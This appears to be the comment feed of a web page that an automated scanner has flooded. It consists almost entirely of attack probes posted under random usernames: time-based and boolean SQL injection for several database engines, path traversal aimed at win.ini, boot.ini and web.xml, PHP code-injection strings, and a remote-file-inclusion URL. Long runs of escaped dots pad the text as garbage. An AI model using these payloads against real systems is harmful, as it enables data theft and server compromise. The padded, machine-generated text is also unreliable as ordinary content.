\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

ccjsvcpk
7/6/2017 6:39:16 AM

Http://testasp.vulnweb.com/t/fit.txt

sknkcrdc
7/6/2017 6:39:17 AM

-1" OR 3*2>(0+5+449-449) --

fwrmxvla
7/6/2017 6:39:27 AM

WEB-INF/web.xml

fwrmxvla
7/6/2017 6:39:33 AM

WEB-INF\web.xml

sknkcrdc
7/6/2017 6:39:42 AM

(select(0)from(select(sleep(70)))v)/*'+(select(0)from(select(sleep(70)))v)+'"+(select(0)from(select(sleep(70)))v)+"*/

sknkcrdc
7/6/2017 6:39:53 AM

1 waitfor delay '0:0:105' --

ccjsvcpk
7/6/2017 6:39:57 AM

http://testasp.vulnweb.com/t/fit.txt?.jpg

sknkcrdc
7/6/2017 6:39:59 AM

if(now()=sysdate(),sleep(70),0)/*'XOR(if(now()=sysdate(),sleep(70),0))OR'"XOR(if(now()=sysdate(),sleep(70),0))OR"*/

ccjsvcpk
7/6/2017 6:40:00 AM

http://testasp.vulnweb.com/t/fit.txt?.jpg

ccjsvcpk
7/6/2017 6:40:06 AM

testasp.vulnweb.com

sknkcrdc
7/6/2017 6:40:13 AM

nt22TnNw'; waitfor delay '0:0:105' --

sknkcrdc
7/6/2017 6:40:27 AM

FyUe3Kwe'); waitfor delay '0:0:105' --

sknkcrdc
7/6/2017 6:40:46 AM

8vat2SO7')); waitfor delay '0:0:105' --

sknkcrdc
7/6/2017 6:40:59 AM

B8AM7gkR';select pg_sleep(105); --

sknkcrdc
7/6/2017 6:41:04 AM

EGXAjMur');select pg_sleep(105); --

sknkcrdc
7/6/2017 6:41:10 AM

Aw0eZ20l'));select pg_sleep(35); --

fwrmxvla
7/6/2017 6:46:00 AM

../../../../../../../../../../windows/win.ini

fwrmxvla
7/6/2017 6:46:06 AM

../../../../../../../../../../boot.ini

fwrmxvla
7/6/2017 6:46:17 AM

../../../../../../../../../../windows/win.ini.jpg

fwrmxvla
7/6/2017 6:46:28 AM

������������������������������������������������windows��win.ini

fwrmxvla
7/6/2017 6:46:47 AM

................windowswin.ini

fwrmxvla
7/6/2017 6:46:57 AM

..\..\..\..\..\..\..\..\windows\win.ini

fwrmxvla
7/6/2017 6:47:13 AM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

fwrmxvla
7/6/2017 6:47:21 AM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

fwrmxvla
7/6/2017 6:47:30 AM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

fwrmxvla
7/6/2017 6:47:40 AM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

fwrmxvla
7/6/2017 6:47:45 AM

WEB-INF/web.xml

fwrmxvla
7/6/2017 6:47:56 AM

WEB-INF\web.xml

kqqtjuju
7/6/2017 6:48:13 AM

)

kqqtjuju
7/6/2017 6:48:18 AM

!(()&&!|*|*|

kqqtjuju
7/6/2017 6:48:30 AM

^(#$!@#$)(()))******

sknkcrdc
7/6/2017 6:48:41 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 6:48:45 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 6:48:54 AM

-1 OR 2+496-496-1=0+0+0+1 --

sknkcrdc
7/6/2017 6:49:10 AM

-1 OR 3+496-496-1=0+0+0+1 --

sknkcrdc
7/6/2017 6:49:16 AM

-1 OR 3*2<(0+5+496-496) --

sknkcrdc
7/6/2017 6:49:26 AM

-1 OR 3*2>(0+5+496-496) --

kqqtjuju
7/6/2017 6:49:28 AM

)

kqqtjuju
7/6/2017 6:49:32 AM

!(()&&!|*|*|

sknkcrdc
7/6/2017 6:49:34 AM

-1 OR 2+507-507-1=0+0+0+1

kqqtjuju
7/6/2017 6:49:45 AM

^(#$!@#$)(()))******

sknkcrdc
7/6/2017 6:49:48 AM

-1 OR 3+507-507-1=0+0+0+1

sknkcrdc
7/6/2017 6:49:55 AM

-1 OR 3*2<(0+5+507-507)

sknkcrdc
7/6/2017 6:50:00 AM

-1 OR 3*2>(0+5+507-507)

sknkcrdc
7/6/2017 6:50:03 AM

-1' OR 2+827-827-1=0+0+0+1 --

sknkcrdc
7/6/2017 6:50:07 AM

-1' OR 3+827-827-1=0+0+0+1 --

sknkcrdc
7/6/2017 6:50:10 AM

-1' OR 3*2<(0+5+827-827) --

sknkcrdc
7/6/2017 6:50:23 AM

-1' OR 3*2>(0+5+827-827) --

sknkcrdc
7/6/2017 6:50:33 AM

-1' OR 2+44-44-1=0+0+0+1 or 'iiS16Bot'='

sknkcrdc
7/6/2017 6:50:48 AM

-1' OR 3+44-44-1=0+0+0+1 or 'iiS16Bot'='

sknkcrdc
7/6/2017 6:50:53 AM

-1' OR 3*2<(0+5+44-44) or 'iiS16Bot'='

sknkcrdc
7/6/2017 6:51:11 AM

-1' OR 3*2>(0+5+44-44) or 'iiS16Bot'='

sknkcrdc
7/6/2017 6:51:17 AM

-1" OR 2+966-966-1=0+0+0+1 --

sknkcrdc
7/6/2017 6:51:21 AM

-1" OR 3+966-966-1=0+0+0+1 --

kqqtjuju
7/6/2017 6:51:26 AM

)

sknkcrdc
7/6/2017 6:51:28 AM

-1" OR 3*2<(0+5+966-966) --

kqqtjuju
7/6/2017 6:51:36 AM

!(()&&!|*|*|

sknkcrdc
7/6/2017 6:51:39 AM

-1" OR 3*2>(0+5+966-966) --

kqqtjuju
7/6/2017 6:51:45 AM

^(#$!@#$)(()))******

sknkcrdc
7/6/2017 6:51:51 AM

if(now()=sysdate(),sleep(78),0)/*'XOR(if(now()=sysdate(),sleep(78),0))OR'"XOR(if(now()=sysdate(),sleep(78),0))OR"*/

sknkcrdc
7/6/2017 6:52:11 AM

(select(0)from(select(sleep(78)))v)/*'+(select(0)from(select(sleep(78)))v)+'"+(select(0)from(select(sleep(78)))v)+"*/

sknkcrdc
7/6/2017 6:52:26 AM

1 waitfor delay '0:0:117' --

sknkcrdc
7/6/2017 6:52:38 AM

HgXO3oig'; waitfor delay '0:0:117' --

kqqtjuju
7/6/2017 6:52:41 AM

)

kqqtjuju
7/6/2017 6:52:54 AM

!(()&&!|*|*|

sknkcrdc
7/6/2017 6:53:00 AM

8OHykMLi'); waitfor delay '0:0:117' --

kqqtjuju
7/6/2017 6:53:02 AM

^(#$!@#$)(()))******

sknkcrdc
7/6/2017 6:53:05 AM

dtJarCsF')); waitfor delay '0:0:39' --

sknkcrdc
7/6/2017 6:53:13 AM

Kw16Nn5c';select pg_sleep(39); --

sknkcrdc
7/6/2017 6:53:18 AM

hIC3dDNX');select pg_sleep(39); --

sknkcrdc
7/6/2017 6:53:51 AM

ap0erTRE'));select pg_sleep(39); --

kqqtjuju
7/6/2017 6:54:19 AM

)

kqqtjuju
7/6/2017 6:54:29 AM

!(()&&!|*|*|

kqqtjuju
7/6/2017 6:54:32 AM

^(#$!@#$)(()))******

kqqtjuju
7/6/2017 6:55:41 AM

)

kqqtjuju
7/6/2017 6:56:06 AM

!(()&&!|*|*|

kqqtjuju
7/6/2017 6:56:18 AM

^(#$!@#$)(()))******

kqqtjuju
7/6/2017 6:57:17 AM

)

kqqtjuju
7/6/2017 6:57:23 AM

!(()&&!|*|*|

kqqtjuju
7/6/2017 6:57:27 AM

^(#$!@#$)(()))******

kqqtjuju
7/6/2017 6:58:30 AM

)

kqqtjuju
7/6/2017 6:58:39 AM

!(()&&!|*|*|

kqqtjuju
7/6/2017 6:58:46 AM

^(#$!@#$)(()))******

kqqtjuju
7/6/2017 6:59:21 AM

)

kqqtjuju
7/6/2017 6:59:24 AM

!(()&&!|*|*|

kqqtjuju
7/6/2017 6:59:49 AM

^(#$!@#$)(()))******

sknkcrdc
7/6/2017 7:00:12 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 7:00:13 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 7:00:20 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 7:00:24 AM

-1 OR 2+503-503-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:00:31 AM

-1 OR 3+503-503-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:00:34 AM

-1 OR 3*2<(0+5+503-503) --

sknkcrdc
7/6/2017 7:00:38 AM

-1 OR 3*2>(0+5+503-503) --

sknkcrdc
7/6/2017 7:00:44 AM

-1 OR 2+695-695-1=0+0+0+1

sknkcrdc
7/6/2017 7:00:49 AM

-1 OR 3+695-695-1=0+0+0+1

sknkcrdc
7/6/2017 7:00:53 AM

-1 OR 3*2<(0+5+695-695)

sknkcrdc
7/6/2017 7:00:57 AM

-1 OR 3*2>(0+5+695-695)

sknkcrdc
7/6/2017 7:01:01 AM

-1' OR 2+673-673-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:01:04 AM

-1' OR 3+673-673-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:01:09 AM

-1' OR 3*2<(0+5+673-673) --

sknkcrdc
7/6/2017 7:01:26 AM

-1' OR 3*2>(0+5+673-673) --

sknkcrdc
7/6/2017 7:01:30 AM

-1' OR 2+652-652-1=0+0+0+1 or 'wMuKWwLA'='

sknkcrdc
7/6/2017 7:01:39 AM

-1' OR 3+652-652-1=0+0+0+1 or 'wMuKWwLA'='

sknkcrdc
7/6/2017 7:01:43 AM

-1' OR 3*2<(0+5+652-652) or 'wMuKWwLA'='

lwphbdto
7/6/2017 7:01:49 AM

Ý kiến của bạn

lwphbdto
7/6/2017 7:01:53 AM

'"()

sknkcrdc
7/6/2017 7:01:54 AM

-1' OR 3*2>(0+5+652-652) or 'wMuKWwLA'='

sknkcrdc
7/6/2017 7:02:01 AM

-1" OR 2+517-517-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:02:13 AM

-1" OR 3+517-517-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:02:19 AM

-1" OR 3*2<(0+5+517-517) --

sknkcrdc
7/6/2017 7:02:23 AM

-1" OR 3*2>(0+5+517-517) --

sknkcrdc
7/6/2017 7:02:28 AM

if(now()=sysdate(),sleep(86),0)/*'XOR(if(now()=sysdate(),sleep(86),0))OR'"XOR(if(now()=sysdate(),sleep(86),0))OR"*/

sknkcrdc
7/6/2017 7:02:34 AM

(select(0)from(select(sleep(86)))v)/*'+(select(0)from(select(sleep(86)))v)+'"+(select(0)from(select(sleep(86)))v)+"*/

lwphbdto
7/6/2017 7:02:38 AM

Ý kiến của bạn

sknkcrdc
7/6/2017 7:02:40 AM

1 waitfor delay '0:0:86' --

lwphbdto
7/6/2017 7:02:42 AM

'"()

sknkcrdc
7/6/2017 7:02:45 AM

S31Jg8N9'; waitfor delay '0:0:86' --

sknkcrdc
7/6/2017 7:02:50 AM

xxBq5Y7p'); waitfor delay '0:0:86' --

sknkcrdc
7/6/2017 7:03:09 AM

IWXbfAI6')); waitfor delay '0:0:129' --

sknkcrdc
7/6/2017 7:03:29 AM

nxoXD1iV';select pg_sleep(129); --

sknkcrdc
7/6/2017 7:03:33 AM

IiRoIMUC');select pg_sleep(129); --

sknkcrdc
7/6/2017 7:03:40 AM

cKukwPrb'));select pg_sleep(129); --

lwphbdto
7/6/2017 7:03:43 AM

Ý kiến của bạn

lwphbdto
7/6/2017 7:03:57 AM

'"()

lwphbdto
7/6/2017 7:04:20 AM

Ý kiến của bạn

lwphbdto
7/6/2017 7:04:23 AM

'"()

lwphbdto
7/6/2017 7:05:47 AM

Ý kiến của bạn

lwphbdto
7/6/2017 7:05:51 AM

'"()

lwphbdto
7/6/2017 7:07:14 AM

Ý kiến của bạn

lwphbdto
7/6/2017 7:07:23 AM

'"()

hvlcrvgk
7/6/2017 7:07:34 AM

;print(md5(acunetix_wvs_security_test));

lwphbdto
7/6/2017 7:07:55 AM

Ý kiến của bạn

lwphbdto
7/6/2017 7:08:01 AM

'"()

hvlcrvgk
7/6/2017 7:08:04 AM

';print(md5(acunetix_wvs_security_test));$a='

hvlcrvgk
7/6/2017 7:08:08 AM

";print(md5(acunetix_wvs_security_test));$a="

hvlcrvgk
7/6/2017 7:08:24 AM

${@print(md5(acunetix_wvs_security_test))}

hvlcrvgk
7/6/2017 7:08:32 AM

${@print(md5(acunetix_wvs_security_test))}\

lwphbdto
7/6/2017 7:09:42 AM

Ý kiến của bạn

lwphbdto
7/6/2017 7:09:51 AM

'"()

lwphbdto
7/6/2017 7:10:51 AM

Ý kiến của bạn

lwphbdto
7/6/2017 7:10:54 AM

'"()

hvlcrvgk
7/6/2017 7:12:23 AM

;print(md5(acunetix_wvs_security_test));

hvlcrvgk
7/6/2017 7:12:49 AM

';print(md5(acunetix_wvs_security_test));$a='

sknkcrdc
7/6/2017 7:12:55 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

hvlcrvgk
7/6/2017 7:12:59 AM

";print(md5(acunetix_wvs_security_test));$a="

sknkcrdc
7/6/2017 7:13:00 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 7:13:13 AM

-1 OR 2+786-786-1=0+0+0+1 --

hvlcrvgk
7/6/2017 7:13:17 AM

${@print(md5(acunetix_wvs_security_test))}

sknkcrdc
7/6/2017 7:13:20 AM

-1 OR 3+786-786-1=0+0+0+1 --

hvlcrvgk
7/6/2017 7:13:21 AM

${@print(md5(acunetix_wvs_security_test))}\

sknkcrdc
7/6/2017 7:13:26 AM

-1 OR 3*2<(0+5+786-786) --

sknkcrdc
7/6/2017 7:13:30 AM

-1 OR 3*2>(0+5+786-786) --

sknkcrdc
7/6/2017 7:13:43 AM

-1 OR 2+777-777-1=0+0+0+1

sknkcrdc
7/6/2017 7:13:50 AM

-1 OR 3+777-777-1=0+0+0+1

sknkcrdc
7/6/2017 7:13:55 AM

-1 OR 3*2<(0+5+777-777)

sknkcrdc
7/6/2017 7:13:59 AM

-1 OR 3*2>(0+5+777-777)

sknkcrdc
7/6/2017 7:14:03 AM

-1' OR 2+856-856-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:14:12 AM

-1' OR 3+856-856-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:14:34 AM

-1' OR 3*2<(0+5+856-856) --

sknkcrdc
7/6/2017 7:14:52 AM

-1' OR 3*2>(0+5+856-856) --

sknkcrdc
7/6/2017 7:14:55 AM

-1' OR 2+388-388-1=0+0+0+1 or 'dPxayX9v'='

sknkcrdc
7/6/2017 7:15:02 AM

-1' OR 3+388-388-1=0+0+0+1 or 'dPxayX9v'='

sknkcrdc
7/6/2017 7:15:06 AM

-1' OR 3*2<(0+5+388-388) or 'dPxayX9v'='

sknkcrdc
7/6/2017 7:15:15 AM

-1' OR 3*2>(0+5+388-388) or 'dPxayX9v'='

hvlcrvgk
7/6/2017 7:15:19 AM

;print(md5(acunetix_wvs_security_test));

sknkcrdc
7/6/2017 7:15:23 AM

-1" OR 2+67-67-1=0+0+0+1 --

hvlcrvgk
7/6/2017 7:15:27 AM

';print(md5(acunetix_wvs_security_test));$a='

sknkcrdc
7/6/2017 7:15:30 AM

-1" OR 3+67-67-1=0+0+0+1 --

hvlcrvgk
7/6/2017 7:15:37 AM

";print(md5(acunetix_wvs_security_test));$a="

sknkcrdc
7/6/2017 7:15:42 AM

-1" OR 3*2<(0+5+67-67) --

sknkcrdc
7/6/2017 7:15:46 AM

-1" OR 3*2>(0+5+67-67) --

sknkcrdc
7/6/2017 7:15:50 AM

if(now()=sysdate(),sleep(47),0)/*'XOR(if(now()=sysdate(),sleep(47),0))OR'"XOR(if(now()=sysdate(),sleep(47),0))OR"*/

sknkcrdc
7/6/2017 7:15:53 AM

